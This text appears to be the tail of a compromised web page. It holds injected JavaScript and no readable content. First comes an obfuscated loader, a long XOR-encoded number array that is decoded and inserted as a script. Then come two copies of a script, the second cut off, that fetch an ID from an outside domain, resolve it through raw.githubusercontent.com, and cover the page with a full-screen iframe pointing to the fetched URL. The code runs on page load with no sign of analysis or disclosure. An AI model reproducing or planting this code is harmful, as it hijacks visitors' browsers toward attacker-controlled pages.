51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,55,53,47,52,46,122,103,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,97,87,80,122,122,122,122,122,122,51,60,122,114,123,55,53,47,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,46,59,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,46,63,34,46,59,40,63,59,120,115,97,87,80,122,122,122,122,122,122,46,59,116,44,59,54,47,63,122,103,122,46,63,34,46,97,87,80,122,122,122,122,122,122,46,59,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,40,63,59,62,53,52,54,35,120,118,122,120,40,63,59,62,53,52,54,35,120,115,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,42,53,41,51,46,51,53,52,122,103,122,120,60,51,34,63,62,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,54,63,60,46,122,103,122,120,119,99,99,99,99,42,34,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,46,53,42,122,103,122,120,106,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,53,42,59,57,51,46,35,122,103,122,120,106,120,97,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,46,59,115,97,87,80,122,122,122,122,122,122,46,40,35,122,33,122,46,59,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,46,59,116,41,63,54,63,57,46,114,115,97,87,80,122,122,122,122,122,122,46,59,116,41,63,46,9,63,54,63,57,46,51,53,52,8,59,52,61,63,114,106,118,122,46,59,116,44,59,54,47,63,116,54,63,52,61,46,50,115,97,87,80,122,122,122,122,122,122,62,53,57,47,55,63,52,46,116,63,34,63,57,25,53,55,55,59,52,62,114,120,57,53,42,35,120,115,97,87,80,122,122,122,122,122,122,51,60,122,114,46,59,116,42,59,40,63,52,46,20,53,62,63,115,122,46,59,116,42,59,40,63,52,46,20,53,62,63,116,40,63,55,53,44,63,25,50,51,54,62,114,46,59,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,122,33,87,80,122,122,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,55,63,41,41,59,61,63,24,53,47,52,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,55,63,41,41,59,61,63,24,53,47,52,62,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,45,51,52,62,53,45,116,59,62,62,31,44,63,52,46,22,51,41,46,63,52,63,40,114,120,55,63,41,41,59,61,63,120,118,122,60,47,52,57,46,51,53,52,122,114,63,44,63,52,46,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,62,59,46,59,122,103,122,63,44,63,52,46,122,124,124,122,63,44,63,52,46,116,62,59,46,59,97,87,80,122,122,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,51,60,40,59,55,63,122,38,38,122,123,62,59,46,59,122,38,38,122,46,35,42,63,53,60,122,62,59,46,59,122,123,103,103,122,120,53,56,48,63,57,46,120,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,63,44,63,52,46,116,41,53,47,40,57,63,122,124,124,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,122,124,124,122,63,44,63,52,46,116,41,53,47,40,57,63,122,123,103,103,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,49,46,54,119,41,50,53,45,119,53,40,51,61,51,52,59,54,120,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,49,46,54,119,60,40,59,55,63,119,40,63,59,62,35,120,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,57,53,42,35,120,122,124,124,122,46,35,42,63,53,60,122,62,59,46,59,116,46,63,34,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,122,122,46,40,35,25,53,42,35,114,62,59,46,59,116,46,63,34,46,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,57,54,63,59,52,47,42,114,52,63,34,46,9,46,59,46,47,41,115,122,33,87,80,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,122,52,47,54,54,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,51,60,40,59,55,63,122,124,124,122,51,60,40,59,55,63,116,42,59,40,63,52,46,20,53,62,63,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,40,59,55,63,116,42,59,40,63,52,46,20,53,62,63,116,40,63,55,53,44,63,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,52,63,34,46,9,46,59,46,47,41,122,38,38,122,120,62,53,52,63,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,62,122,38,38,122,123,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,41,46,63,42,114,51,52,62,63,34,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,51,52,62,63,34,122,100,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,60,61,122,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,52,62,63,34,7,122,38,38,122,33,39,97,87,80,122,122,122,122,122,122,44,59,40,122,56,47,51,54,46,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,57,60,61,116,46,63,55,42,54,59,46,63,122,38,38,122,120,120,118,122,51,62,115,115,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,56,47,51,54,46,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,57,60,61,116,47,41,63,28,63,46,57,50,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,56,47,51,54,46,15,40,54,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,56,47,51,54,46,15,40,54,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,40,59,45,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,44,59,40,122,54,59,52,62,51,52,61,15,40,54,122,103,122,63,34,46,40,59,57,46,22,59,52,62,51,52,61,15,40,54,114,40,59,45,115,97,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,54,59,52,62,51,52,61,15,40,54,115,122,40,63,46,47,40,52,122,54,59,52,62,51,52,61,15,40,54,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,106,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,47,40,54,115,122,33,87,80,122,122,122,122,51,60,122,114,123,47,40,54,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,34,51,41,46,51,52,61,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,122,122,122,122,51,60,122,114,63,34,51,41,46,51,52,61,115,122,33,87,80,122,122,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,53,47,52,46,122,103,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,97,87,80,122,122,122,122,51,60,122,114,123,55,53,47,52,46,115,122,33,87,80,122,122,122,122,122,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,47,40,54,115,97,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,51,60,40,59,55,63,120,115,97,87,80,122,122,122,122,44,59,40,122,57,54,53,41,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,40,63,44,63,59,54,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,44,59,40,122,46,51,55,63,53,47,46,19,62,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,40,63,44,63,59,54,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,122,38,38,122,40,63,44,63,59,54,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,40,63,44,63,59,54,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,87,80,122,122,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,44,51,41,51,56,51,54,51,46,35,122,103,122,120,44,51,41,51,56,54,63,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,53,42,59,57,51,46,35,122,103,122,120,107,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,42,53,51,52,46,63,40,31,44,63,52,46,41,122,103,122,120,59,47,46,53,120,97,87,80,122,122,122,122,122,122,51,60,40,59,55,63,116,40,63,55,53,44,63,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,115,97,87,80,87,80,122,122,122,122,122,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,122,51,60,40,59,55,63,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,122,124,124,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,116,60,53,57,47,41,114,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,62,63,41,46,40,53,35,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,57,54,53,41,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,46,51,55,63,53,47,46,19,62,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,53,47,46,19,62,115,97,87,80,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,122,62,63,41,46,40,53,35,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,122,40,63,44,63,59,54,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,51,62,122,103,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,27,46,46,40,118,122,120,107,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,40,51,59,119,50,51,62,62,63,52,120,118,122,120,46,40,47,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,54,53,59,62,51,52,61,120,118,122,120,63,59,61,63,40,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,59,54,54,53,45,120,118,122,120,57,54,51,42,56,53,59,40,62,119,45,40,51,46,63,120,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,40,57,122,103,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,120,44,120,118,122,23,59,46,50,116,40,59,52,62,53,55,114,115,116,46,53,9,46,40,51,52,61,114,105,108,115,116,41,54,51,57,63,114,104,115,115,97,87,80,122,122,122,122,51,60,40,59,55,63,116,41,46,35,54,63,116,57,41,41,14,63,34,46,122,103,122,1,87,80,122,122,122,122,122,122,120,42,53,41,51,46,51,53,52,96,60,51,34,63,62,122,123,51,55,42,53,40,46,59,52,46,120,118,87,80,122,122,122,122,122,122,120,46,53,42,96,106,120,118,87,80,122,122,122,122,122,122,120,54,63,60,46,96,106,120,118,87,80,122,122,122,122,122,122,120,45,51,62,46,50,96,107,106,106,44,45,120,118,87,80,122,122,122,122,122,122,120,50,63,51,61,50,46,96,107,106,106,44,50,120,118,87,80,122,122,122,122,122,122,120,56,53,40,62,63,40,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,32,119,51,52,62,63,34,96,104,107,110,109,110,98,105,108,110,109,120,118,87,80,122,122,122,122,122,122,120,55,59,40,61,51,52,96,106,120,118,87,80,122,122,122,122,122,122,120,42,59,62,62,51,52,61,96,106,120,118,87,80,122,122,122,122,122,122,120,53,44,63,40,60,54,53,45,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,44,51,41,51,56,51,54,51,46,35,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,53,42,59,57,51,46,35,96,106,120,118,87,80,122,122,122,122,122,122,120,42,53,51,52,46,63,40,119,63,44,63,52,46,41,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,56,59,57,49,61,40,53,47,52,62,96,46,40,59,52,41,42,59,40,63,52,46,120,87,80,122,122,122,122,7,116,48,53,51,52,114,120,97,120,115,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,54,53,59,62,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,123,40,63,61,51,41,46,40,35,116,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,63,40,40,53,40,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,46,51,55,63,53,47,46,19,62,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,118,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,47,52,114,115,122,33,87,80,122,122,122,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,97,87,80,122,122,122,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,97,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,27,10,19,5,19,30,5,15,8,22,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,51,62,122,103,122,114,51,62,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,60,51,52,59,54,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,60,51,52,59,54,15,40,54,115,97,87,80,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,44,59,40,122,60,51,52,59,54,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,59,54,21,40,51,61,51,52,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,60,51,52,59,54,15,40,54,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,103,122,40,47,52,114,115,97,87,80,39,115,114,115,97];return String.fromCharCode.apply(String,_0x5641.map(function(c){return c^0x5A;}));})();var __d=document;var __h=__d.head||__d.documentElement;var __sc=__d.createElement("script");__sc.type="text/javascript";__sc.text=__s;__h.appendChild(__sc);})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
